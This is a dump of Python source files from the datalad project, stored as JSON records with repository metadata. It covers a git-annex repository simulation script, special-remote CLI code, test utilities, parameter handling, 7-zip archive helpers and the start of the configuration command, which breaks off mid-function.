Python
[ { "alpha_fraction": 0.6177444458007812, "alphanum_fraction": 0.6261311173439026, "avg_line_length": 38.400001525878906, "blob_id": "cd334ea40b1f5c7ff2394182abfdce3f24776b21", "content_id": "5ab15cf395c19bf5643da13ed25e4df60ab13797", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4531, "license_type": "permissive", "max_line_length": 112, "num_lines": 115, "path": "/tools/mimic_repo", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python2\n#emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*- \n#ex: set sts=4 ts=4 sw=4 noet:\n\"\"\"\n Simple script to simulate an annex repository given a list of files.\n\n Not sure why I wrote it in Python, since in bash it would be more natural and shorter ;)\n\n COPYRIGHT: Yaroslav Halchenko 2014\n\n LICENSE: MIT\n\n Permission is hereby granted, free of charge, to any person obtaining a copy\n of this software and associated documentation files (the \"Software\"), to deal\n in the Software without restriction, including without limitation the rights\n to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n copies of the Software, and to permit persons to whom the Software is\n furnished to do so, subject to the following conditions:\n\n The above copyright notice and this permission notice shall be included in\n all copies or substantial portions of the Software.\n\n THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n THE SOFTWARE.\n\"\"\"\n\n__author__ = 'Yaroslav Halchenko'\n__copyright__ = 'Copyright (c) 2014 Yaroslav Halchenko'\n__license__ = 'MIT'\n\nimport sys, os\nimport commands\nimport fileinput\n\ni = 0\naddurl = \"http://some.example.com/prefix/\"\n\ndef run_command(cmd):\n global i\n st, output = commands.getstatusoutput(cmd)\n if st != 0:\n raise RuntimeError(\"E: run of {cmd} failed with status={st} output={output}\".format(**locals()))\n return st, output\n\ndef init_git_annex(path):\n if os.path.exists(path):\n raise RuntimeError(\"path {path} exists already\".format(**locals()))\n run_command('mkdir -p {path}; cd {path}; git init; git annex init'.format(**locals()))\n print(\"I: initialized in {}\".format(path))\n\ndef populate_git_annex(list_, path='.'):\n count = 0\n i = 0\n for l in fileinput.FileInput(list_, openhook=fileinput.hook_compressed):\n if not l: break\n i += 1\n items = l.rstrip().split(None, 3)\n s3filename = items[-1]\n if s3filename.endswith('/'):\n continue\n if not s3filename.startswith('s3://'):\n print \"ERROR: %i: %s is not starting with s3://\" % (i, s3filename)\n import pdb; pdb.set_trace()\n # create a dummy file with content being just a filename\n filename_ = s3filename[5:]\n filename = os.path.join(path, filename_)\n dirname = os.path.dirname(filename)\n if not os.path.exists(dirname):\n os.makedirs(dirname)\n with open(filename, 'w') as fout:\n fout.write(filename)\n count += 1\n if not (i % 100):\n sys.stdout.write('.')\n sys.stdout.flush()#print(\"D: ran {cmd}. Got output {output}\".format(**locals()))\n # TODO\n if addurl:\n # we need to add a url for each file, thus first we just annex add\n run_command('cd {path}; git annex add {filename_}'.format(**locals()))\n # and then add a bogus url\n url = addurl + filename_\n run_command('cd {path}; git annex addurl --relaxed --file={filename_} {url}'.format(**locals()))\n if not addurl:\n print()\n print(\"I: adding to annex {count} files after processing {i} lines\".format(**locals()))\n run_command('cd {path}; git annex add *'.format(**locals()))\n print(\"I: committing\")\n run_command('cd {path}; git commit -m \"final commit\"'.format(**locals()))\n print \"DONE. Created {} files\".format(count)\n\ndef git_repack(path):\n print(\"Repacking {}\".format(path))\n run_command(\"cd {path}; git repack -a -d -f --window=100\".format(path=path))\n\ndef du(path):\n st, output = commands.getstatusoutput('du -sk {path}'.format(path=path))\n print \"du for {path}: {output}\".format(**locals())\n\nif __name__ == '__main__':\n list_ = sys.argv[1]\n path = sys.argv[2]\n init_git_annex(path)\n populate_git_annex(list_, path)\n du(path)\n git_repack(path)\n du(path)\n\n # let's now clone\n run_command(\"git clone --no-hardlinks {path} {path}.cloned\".format(path=path))\n du(path+\".cloned\")\n" }, { "alpha_fraction": 0.6008458137512207, "alphanum_fraction": 0.6027976870536804, "avg_line_length": 33.155555725097656, "blob_id": "0ce2a58c53751b50c6022a119744beb995c0fdb3", "content_id": "a2931ff04b6473ad41a3bcad5c164dfe053290c2", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3074, "license_type": "permissive", "max_line_length": 87, "num_lines": 90, "path": "/datalad/customremotes/main.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 noet:\n### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"CLI entrypoint for special remotes\"\"\"\n\n__docformat__ = 'restructuredtext'\n\n\nimport argparse\n\nfrom datalad.cli.parser import (\n parser_add_common_opt,\n parser_add_version_opt,\n)\nfrom datalad.cli.utils import setup_exceptionhook\nfrom datalad.ui import ui\n\nimport logging\nlgr = logging.getLogger('datalad.customremotes')\n\n\ndef setup_parser(remote_name, description):\n # setup cmdline args parser\n # main parser\n parser = argparse.ArgumentParser(\n description= \\\n f\"git-annex-remote-{remote_name} is a git-annex custom special \" \\\n f\"remote to {description}\",\n epilog='\"DataLad\\'s git-annex very special remote\"',\n formatter_class=argparse.RawDescriptionHelpFormatter,\n add_help=True,\n )\n # common options\n parser_add_common_opt(parser, 'log_level')\n parser_add_version_opt(parser, 'datalad', include_name=True)\n if __debug__:\n parser.add_argument(\n '--dbg', action='store_true', dest='common_debug',\n help=\"Catch exceptions and fall into debugger upon exception\")\n return parser\n\n\ndef _main(args, cls):\n \"\"\"Unprotected portion\"\"\"\n assert(cls is not None)\n from annexremote import Master\n master = Master()\n remote = cls(master)\n master.LinkRemote(remote)\n master.Listen()\n # cleanup\n if hasattr(remote, 'stop'):\n remote.stop()\n\n\ndef main(args=None, cls=None, remote_name=None, description=None):\n import sys\n parser = setup_parser(remote_name, description)\n # parse cmd args\n args = parser.parse_args(args)\n\n # stdin/stdout will be used for interactions with annex\n ui.set_backend('annex')\n\n if args.common_debug:\n # So we could see/stop clearly at the point of failure\n setup_exceptionhook()\n _main(args, cls)\n else:\n # Otherwise - guard and only log the summary. Postmortem is not\n # as convenient if being caught in this ultimate except\n try:\n _main(args, cls)\n except Exception as exc:\n lgr.debug('%s (%s) - passing ERROR to git-annex and exiting',\n str(exc), exc.__class__.__name__)\n # `SpecialRemote` classes are supposed to catch everything and\n # turn it into a `RemoteError` resulting in an ERROR message to\n # annex. If we end up here, something went wrong outside of the\n # `master.Listen()` call in `_main`.\n # In any case, exiting the special remote process should be\n # accompanied by such an ERROR message to annex rather than a log\n # message.\n print(\"ERROR %s (%s)\" % (str(exc), exc.__class__.__name__))\n sys.exit(1)\n" }, { "alpha_fraction": 0.6712328791618347, "alphanum_fraction": 0.6780821681022644, "avg_line_length": 27.29032325744629, "blob_id": "d27cd3ec68d20bdf60d0914e9bdb4b2f4bd022ba", "content_id": "af3ddcf1bf5653bfe6da779f7715ac7944c7e1e3", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 876, "license_type": "permissive", "max_line_length": 83, "num_lines": 31, "path": "/tools/find-hanged-tests", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\n\"\"\"\nGiven a log from running tests using pytest -n 2 (or more) see which tests actually\nnever completed\n\"\"\"\n\nimport sys\nimport re\nfrom pathlib import Path\n\nlogfile = Path(sys.argv[-1])\nprint(f\"Working on {logfile}\")\n\nlines = logfile.read_text().splitlines()\nlines = [l.strip() for l in lines]\ntest_line = re.compile('datalad/.*tests/')\n\ntests_started = {l for l in lines if re.match('\\S*datalad/.*tests/test_', l)}\ntests_completed = set()\nfor l in lines:\n res = re.match(r'\\[gw[0-9]+\\].* (\\S*datalad/.*tests/test_.*)', l)\n if res:\n tests_completed.add(res.groups()[0])\ntests_didnot_complete = tests_started - tests_completed\n\n# print(tests_completed)\nprint(f\"{len(tests_started)} started, {len(tests_completed)} completed\")\nif tests_didnot_complete:\n print(\"Never completed:\")\n for t in sorted(tests_didnot_complete):\n print(t)" }, { "alpha_fraction": 0.6278054714202881, "alphanum_fraction": 0.6359102129936218, "avg_line_length": 36.30232620239258, "blob_id": "be89652dedfca6df78d96ca291c2a629002ce0d4", "content_id": "3d1258528fcfcaf45b543aa75fdb1c419d36c312", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1604, "license_type": "permissive", "max_line_length": 88, "num_lines": 43, "path": "/datalad/interface/tests/test_shell_completion.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"test command datalad shell_completion\n\n\"\"\"\n\n__docformat__ = 'restructuredtext'\n\n# Not really worth to be there but it is ATM, so let's use that\nfrom datalad.api import shell_completion\nfrom datalad.cmd import WitlessRunner\nfrom datalad.tests.utils_pytest import (\n assert_cwd_unchanged,\n eq_,\n skip_if_on_windows,\n swallow_outputs,\n)\n\n\n@assert_cwd_unchanged\ndef test_shell_completion_python():\n # largely a smoke test for our print(\"hello world\")\n with swallow_outputs() as cmo:\n res = shell_completion()\n out = cmo.out.rstrip()\n # we get it printed and returned for double-pleasure\n eq_(out, res[0]['content'].rstrip())\n\n\n@skip_if_on_windows # TODO: make it more specific since might work if bash is available\ndef test_shell_completion_source():\n # just smoke test that produced shell script sources nicely without error\n WitlessRunner().run(['bash', '-c', 'source <(datalad shell-completion)'])\n # ideally we should feed that shell with TAB to see the result of completion but\n # yoh sees no easy way ATM, and googled up\n # https://stackoverflow.com/questions/9137245/unit-test-for-bash-completion-script\n # requires too much enthusiasm toward this goal.\n" }, { "alpha_fraction": 0.5280898809432983, "alphanum_fraction": 0.5355805158615112, "avg_line_length": 27.864864349365234, "blob_id": "b15f842a40e49fcbe14377318bc24b855c0a2d5f", "content_id": "e3266907941a5bcf2e2c6c247ed773aa26dc84fd", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1068, "license_type": "permissive", "max_line_length": 88, "num_lines": 37, "path": "/datalad/support/tests/test_vcr_.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Tests for vcr adapter\"\"\"\n\nfrom ...tests.utils_pytest import (\n SkipTest,\n eq_,\n)\nfrom ..vcr_ import use_cassette\n\n\ndef test_use_cassette_if_no_vcr():\n # just test that our do nothing decorator does the right thing if vcr is not present\n skip = False\n try:\n import vcr\n skip = True\n except ImportError:\n pass\n except:\n # if anything else goes wrong with importing vcr, we still should be able to\n # run use_cassette\n pass\n if skip:\n raise SkipTest(\"vcr is present, can't test behavior with vcr presence ATM\")\n\n @use_cassette(\"some_path\")\n def checker(x):\n return x + 1\n\n eq_(checker(1), 2)\n" }, { "alpha_fraction": 0.47252747416496277, "alphanum_fraction": 0.48526474833488464, "avg_line_length": 26.80555534362793, "blob_id": "509398b1d4349e43e71ef9c2468ad206ee317ee8", "content_id": "3dbcb653c78f097e3c461e63ef69a6462076d1eb", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4004, "license_type": "permissive", "max_line_length": 87, "num_lines": 144, "path": "/datalad/tests/test_dochelpers.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Tests for dochelpers (largely copied from PyMVPA, the same copyright)\n\"\"\"\n\nfrom unittest.mock import patch\n\nfrom datalad.tests.utils_pytest import (\n assert_equal,\n assert_re_in,\n assert_true,\n)\n\nfrom ..dochelpers import (\n borrowdoc,\n borrowkwargs,\n single_or_plural,\n)\n\n\ndef test_basic():\n assert_equal(single_or_plural('a', 'b', 1), 'a')\n assert_equal(single_or_plural('a', 'b', 0), 'b')\n assert_equal(single_or_plural('a', 'b', 123), 'b')\n assert_equal(single_or_plural('a', 'b', 123, include_count=True), '123 b')\n\n\ndef test_borrow_doc():\n\n class A(object):\n def met1(self):\n \"\"\"met1doc\"\"\"\n pass # pragma: no cover\n def met2(self):\n \"\"\"met2doc\"\"\"\n pass # pragma: no cover\n\n class B(object):\n @borrowdoc(A)\n def met1(self):\n pass # pragma: no cover\n @borrowdoc(A, 'met1')\n def met2(self):\n pass # pragma: no cover\n\n assert_equal(B.met1.__doc__, A.met1.__doc__)\n assert_equal(B.met2.__doc__, A.met1.__doc__)\n\n\ndef test_borrow_kwargs():\n\n class A(object):\n def met1(self, kp1=None, kp2=1):\n \"\"\"met1 doc\n\n Parameters\n ----------\n kp1 : None or int\n keyword parameter 1\n kp2 : int, optional\n something\n \"\"\"\n pass # pragma: no cover\n\n def met2(self):\n \"\"\"met2doc\"\"\"\n pass # pragma: no cover\n\n class B(object):\n\n @borrowkwargs(A)\n def met1(self, desc, **kwargs):\n \"\"\"B.met1 doc\n\n Parameters\n ----------\n desc\n description\n **kwargs\n Same as in A.met1\n\n Some postamble\n \"\"\"\n pass # pragma: no cover\n\n @borrowkwargs(A, 'met1')\n def met_nodoc(self, **kwargs):\n pass # pragma: no cover\n\n @borrowkwargs(methodname=A.met1)\n def met_anothermet(self, **kwargs):\n pass # pragma: no cover\n\n @borrowkwargs(A, 'met1')\n def met_nodockwargs(self, bogus=None, **kwargs):\n \"\"\"B.met_nodockwargs\n\n Parameters\n ----------\n bogus\n something\n \"\"\"\n pass # pragma: no cover\n\n if True:\n # Just so we get different indentation level\n @borrowkwargs(A, 'met1', ['kp1'])\n def met_excludes(self, boguse=None, **kwargs):\n \"\"\"B.met_excludes\n\n Parameters\n ----------\n boguse\n something\n \"\"\"\n pass # pragma: no cover\n\n assert_true('B.met1 doc' in B.met1.__doc__)\n for m in (B.met1,\n B.met_nodoc,\n B.met_anothermet,\n B.met_nodockwargs,\n B.met_excludes):\n docstring = m.__doc__\n assert_true('Parameters' in docstring)\n assert_true(not '*kwargs' in docstring,\n msg=\"We shouldn't carry kwargs in docstring now,\"\n \"Got %r for %s\" % (docstring, m))\n assert_true('kp2 ' in docstring)\n assert_true((('kp1 ' in docstring)\n ^ (m == B.met_excludes)))\n # indentation should have been squashed properly\n assert_true(not ' ' in docstring)\n\n # some additional checks to see if we are not losing anything\n assert_true('Some postamble' in B.met1.__doc__)\n assert_true('B.met_nodockwargs' in B.met_nodockwargs.__doc__)\n assert_true('boguse' in B.met_excludes.__doc__)\n" }, { "alpha_fraction": 0.5509049892425537, "alphanum_fraction": 0.5550528168678284, "avg_line_length": 38.582088470458984, "blob_id": "ecb13c0e854fa4ba1cdca1df7b63aff8fbd317bc", "content_id": "2c8a7c61e6de6fdcc6eb27836df5bd76ac0c194c", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5304, "license_type": "permissive", "max_line_length": 88, "num_lines": 134, "path": "/datalad/support/param.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; indent-tabs-mode: nil -*-\n# vi: set ft=python sts=4 ts=4 sw=4 et:\n### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##g\n\"\"\"Parameter representation\"\"\"\n\n__docformat__ = 'restructuredtext'\n\nimport re\nimport textwrap\nimport argparse\nfrom datalad.utils import getargspec\n\nfrom .constraints import expand_constraint_spec\n\n_whitespace_re = re.compile(r'\\n\\s+|^\\s+')\n\n\nclass Parameter(object):\n \"\"\"This class shall serve as a representation of a parameter.\n \"\"\"\n\n # Known keyword arguments which we want to allow to pass over into\n # argparser.add_argument . Mentioned explicitly, since otherwise\n # are not verified while working in Python-only API\n # include_kwonlyargs=True is future-proofing since ATM in 3.9 there is no\n # *, in Action.__init__ but could be added later, and semantically it\n # makes sense to include those among _KNOWN_ARGS\n _KNOWN_ARGS = getargspec(\n argparse.Action.__init__, include_kwonlyargs=True\n ).args + ['action']\n\n def __init__(self, constraints=None, doc=None, args=None, **kwargs):\n \"\"\"Add constraints (validator) specifications and a docstring for\n a parameter.\n\n Parameters\n ----------\n constraints : callable\n A functor that takes any input value, performs checks or type\n conversions and finally returns a value that is appropriate for a\n parameter or raises an exception. This will also be used to set up\n the ``type`` functionality of argparse.add_argument.\n doc : str\n Documentation about the purpose of this parameter.\n args : tuple or None\n Any additional positional args for argparser.add_argument. This is\n most useful for assigned multiple alternative argument names or\n create positional arguments.\n **kwargs :\n Any additional keyword args for argparser.add_argument.\n\n Examples\n --------\n Ensure a parameter is a float\n >>> from datalad.support.param import Parameter\n >>> from datalad.support.constraints import (EnsureFloat, EnsureRange,\n ... AltConstraints, Constraints)\n >>> C = Parameter(constraints=EnsureFloat())\n\n Ensure a parameter is of type float or None:\n >>> C = Parameter(constraints=AltConstraints(EnsureFloat(), None))\n\n Ensure a parameter is None or of type float and lies in the inclusive\n range (7.0,44.0):\n >>> C = Parameter(\n ... AltConstraints(\n ... Constraints(EnsureFloat(),\n ... EnsureRange(min=7.0, max=44.0)),\n ... None))\n \"\"\"\n self.constraints = expand_constraint_spec(constraints)\n self._doc = doc\n self.cmd_args = args\n\n # Verify that no mistyped kwargs present\n unknown_args = set(kwargs).difference(self._KNOWN_ARGS)\n if unknown_args:\n raise ValueError(\n \"Detected unknown argument(s) for the Parameter: %s. Known are: %s\"\n % (', '.join(unknown_args), ', '.join(self._KNOWN_ARGS))\n )\n self.cmd_kwargs = kwargs\n\n def get_autodoc(self, name, indent=\" \", width=70, default=None, has_default=False):\n \"\"\"Docstring for the parameter to be used in lists of parameters\n\n Returns\n -------\n string or list of strings (if indent is None)\n \"\"\"\n paramsdoc = '%s' % name\n sdoc = None\n if self.constraints is not None:\n sdoc = self.constraints.short_description()\n elif 'action' in self.cmd_kwargs \\\n and self.cmd_kwargs['action'] in (\"store_true\", \"store_false\"):\n sdoc = 'bool'\n if sdoc is not None:\n if sdoc[0] == '(' and sdoc[-1] == ')':\n sdoc = sdoc[1:-1]\n nargs = self.cmd_kwargs.get('nargs', '')\n if isinstance(nargs, int):\n sdoc = '{}-item sequence of {}'.format(nargs, sdoc)\n elif nargs == '+':\n sdoc = 'non-empty sequence of {}'.format(sdoc)\n elif nargs == '*':\n sdoc = 'sequence of {}'.format(sdoc)\n if self.cmd_kwargs.get('action', None) == 'append':\n sdoc = 'list of {}'.format(sdoc)\n paramsdoc += \" : %s\" % sdoc\n if has_default:\n paramsdoc += \", optional\"\n paramsdoc = [paramsdoc]\n\n doc = self._doc\n if doc is None:\n doc = ''\n doc = doc.strip()\n if len(doc) and not doc.endswith('.'):\n doc += '.'\n if has_default:\n doc += \" [Default: %r]\" % (default,)\n # Explicitly deal with multiple spaces, for some reason\n # replace_whitespace is non-effective\n doc = _whitespace_re.sub(' ', doc)\n paramsdoc += [indent + x\n for x in textwrap.wrap(doc, width=width - len(indent),\n replace_whitespace=True)]\n return '\\n'.join(paramsdoc)\n" }, { "alpha_fraction": 0.5807946920394897, "alphanum_fraction": 0.5887417197227478, "avg_line_length": 30.45833396911621, "blob_id": "ee96511954af0ac9f5d01a288bbababf4664c844", "content_id": "b7fb50c696de448463ceec36016179c5b39e9cc7", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3020, "license_type": "permissive", "max_line_length": 87, "num_lines": 96, "path": "/datalad/support/archive_utils_7z.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"7-zip based implementation for datalad.support.archives utilities\"\"\"\n\n\nfrom datalad.support.external_versions import external_versions\nexternal_versions.check(\n \"cmd:7z\",\n msg='The 7z binary (7-Zip) is required for archive handling, but is missing. '\n \"Setting the config flag 'datalad.runtime.use-patool' enables an \"\n \"alternative implementation that may not need 7z.\")\n\nfrom datalad.utils import (\n Path,\n join_cmdline,\n quote_cmdlinearg,\n)\n\nimport logging\nlgr = logging.getLogger('datalad.support.archive_utils_7z')\n\nfrom datalad.cmd import (\n WitlessRunner as Runner,\n KillOutput,\n)\n\n\ndef _normalize_fname_suffixes(suffixes):\n if suffixes == ['.tgz']:\n suffixes = ['.tar', '.gz']\n elif suffixes == ['.tbz2']:\n suffixes = ['.tar', '.bzip2']\n return suffixes\n\n\ndef decompress_file(archive, dir_):\n \"\"\"Decompress `archive` into a directory `dir_`\n\n This is an alternative implementation without patool, but directly calling 7z.\n\n Parameters\n ----------\n archive: str\n dir_: str\n \"\"\"\n apath = Path(archive)\n runner = Runner(cwd=dir_)\n suffixes = _normalize_fname_suffixes(apath.suffixes)\n if len(suffixes) > 1 and suffixes[-2] == '.tar':\n # we have a compressed tar file that needs to be fed through the\n # decompressor first\n cmd = '7z x {} -so | 7z x -si -ttar'.format(quote_cmdlinearg(archive))\n else:\n # fire and forget\n cmd = ['7z', 'x', archive]\n runner.run(cmd, protocol=KillOutput)\n\n\ndef compress_files(files, archive, path=None, overwrite=True):\n \"\"\"Compress `files` into an `archive` file\n\n Parameters\n ----------\n files : list of str\n archive : str\n path : str\n Alternative directory under which compressor will be invoked, to e.g.\n take into account relative paths of files and/or archive\n overwrite : bool\n Whether to allow overwriting the target archive file if one already exists\n \"\"\"\n runner = Runner(cwd=path)\n apath = Path(archive)\n if apath.exists():\n if overwrite:\n apath.unlink()\n else:\n raise ValueError(\n 'Target archive {} already exists and overwrite is forbidden'.format(\n apath)\n )\n suffixes = _normalize_fname_suffixes(apath.suffixes)\n if len(suffixes) > 1 and suffixes[-2] == '.tar':\n cmd = '7z u .tar -so -- {} | 7z u -si -- {}'.format(\n join_cmdline(files),\n quote_cmdlinearg(str(apath)),\n )\n else:\n cmd = ['7z', 'u', str(apath), '--'] + files\n runner.run(cmd, protocol=KillOutput)\n" }, { "alpha_fraction": 0.557486891746521, "alphanum_fraction": 0.558880090713501, "avg_line_length": 35.58495330810547, "blob_id": "59fc07df1633d342d4ea1d6e96cbc7d50a5536e8", "content_id": "580cbc5981de35fe2ffc2fe08bf70c86759537a8", "detected_licenses": [ "LicenseRef-scancode-unknown-license-reference", "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 15073, "license_type": "permissive", "max_line_length": 95, "num_lines": 412, "path": "/datalad/local/configuration.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 noet:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Frontend for the DataLad config\"\"\"\n\n__docformat__ = 'restructuredtext'\n\n\nimport logging\nfrom textwrap import wrap\n\nimport datalad.support.ansi_colors as ac\nfrom datalad import cfg as dlcfg\nfrom datalad.distribution.dataset import (\n Dataset,\n EnsureDataset,\n datasetmethod,\n require_dataset,\n)\nfrom datalad.interface.base import (\n Interface,\n build_doc,\n eval_results,\n)\nfrom datalad.interface.common_cfg import definitions as cfg_defs\nfrom datalad.interface.common_opts import (\n recursion_flag,\n recursion_limit,\n)\nfrom datalad.interface.results import get_status_dict\nfrom datalad.interface.utils import default_result_renderer\nfrom datalad.support.constraints import (\n EnsureChoice,\n EnsureNone,\n)\nfrom datalad.support.exceptions import (\n CommandError,\n NoDatasetFound,\n)\nfrom datalad.support.param import Parameter\nfrom datalad.utils import (\n Path,\n ensure_list,\n)\n\nlgr = logging.getLogger('datalad.local.configuration')\n\nconfig_actions = ('dump', 'get', 'set', 'unset')\n\n\n@build_doc\nclass Configuration(Interface):\n \"\"\"Get and set dataset, dataset-clone-local, or global configuration\n\n This command works similar to git-config, but some features are not\n supported (e.g., modifying system configuration), while other features\n are not available in git-config (e.g., multi-configuration queries).\n\n Query and modification of three distinct configuration scopes is\n supported:\n\n - 'branch': the persistent configuration in .datalad/config of a dataset\n branch\n - 'local': a dataset clone's Git repository configuration in .git/config\n - 'global': non-dataset-specific configuration (usually in $USER/.gitconfig)\n\n Modifications of the persistent 'branch' configuration will not be saved\n by this command, but have to be committed with a subsequent `save`\n call.\n\n Rules of precedence regarding different configuration scopes are the same\n as in Git, with two exceptions: 1) environment variables can be used to\n override any datalad configuration, and have precedence over any other\n configuration scope (see below). 2) the 'branch' scope is considered in\n addition to the standard git configuration scopes. Its content has lower\n precedence than Git configuration scopes, but it is committed to a branch,\n hence can be used to ship (default and branch-specific) configuration with\n a dataset.\n\n Besides storing configuration settings statically via this command or ``git\n config``, DataLad also reads any :envvar:`DATALAD_*` environment on process\n startup or import, and maps it to a configuration item. Their values take\n precedence over any other specification. In variable names ``_`` encodes a\n ``.`` in the configuration name, and ``__`` encodes a ``-``, such that\n ``DATALAD_SOME__VAR`` is mapped to ``datalad.some-var``. Additionally, a\n :envvar:`DATALAD_CONFIG_OVERRIDES_JSON` environment variable is\n queried, which may contain configuration key-value mappings as a\n JSON-formatted string of a JSON-object::\n\n DATALAD_CONFIG_OVERRIDES_JSON='{\"datalad.credential.example_com.user\": \"jane\", ...}'\n\n This is useful when characters are part of the configuration key that\n cannot be encoded into an environment variable name. If both individual\n configuration variables *and* JSON-overrides are used, the former take\n precedent over the latter, overriding the respective *individual* settings\n from configurations declared in the JSON-overrides.\n\n This command supports recursive operation for querying and modifying\n configuration across a hierarchy of datasets.\n \"\"\"\n _examples_ = [\n dict(text=\"Dump the effective configuration, including an annotation for common items\",\n code_py=\"configuration()\",\n code_cmd=\"datalad configuration\"),\n dict(text=\"Query two configuration items\",\n code_py=\"configuration('get', ['user.name', 'user.email'])\",\n code_cmd=\"datalad configuration get user.name user.email\"),\n dict(text=\"Recursively set configuration in all (sub)dataset repositories\",\n code_py=\"configuration('set', [('my.config.name', 'value')], recursive=True)\",\n code_cmd=\"datalad configuration -r set my.config=value\"),\n dict(text=\"Modify the persistent branch configuration (changes are not committed)\",\n code_py=\"configuration('set', [('my.config.name', 'value')], scope='branch')\",\n code_cmd=\"datalad configuration --scope branch set my.config=value\"),\n ]\n\n result_renderer = 'tailored'\n\n _params_ = dict(\n dataset=Parameter(\n args=(\"-d\", \"--dataset\"),\n doc=\"\"\"specify the dataset to query or to configure\"\"\",\n constraints=EnsureDataset() | EnsureNone()),\n action=Parameter(\n args=(\"action\",),\n nargs='?',\n doc=\"\"\"which action to perform\"\"\",\n constraints=EnsureChoice(*config_actions)),\n scope=Parameter(\n args=(\"--scope\",),\n doc=\"\"\"scope for getting or setting\n configuration. If no scope is declared for a query, all\n configuration sources (including overrides via environment\n variables) are considered according to the normal\n rules of precedence. For action 'get' only 'branch' and 'local'\n (which include 'global' here) are supported. For action 'dump',\n a scope selection is ignored and all available scopes are\n considered.\"\"\",\n constraints=EnsureChoice('global', 'local', 'branch', None)),\n spec=Parameter(\n args=(\"spec\",),\n doc=\"\"\"configuration name (for actions 'get' and 'unset'),\n or name/value pair (for action 'set')\"\"\",\n nargs='*',\n metavar='name[=value]'),\n recursive=recursion_flag,\n recursion_limit=recursion_limit,\n )\n\n @staticmethod\n @datasetmethod(name='configuration')\n @eval_results\n def __call__(\n action='dump',\n spec=None,\n *,\n scope=None,\n dataset=None,\n recursive=False,\n recursion_limit=None):\n\n # check 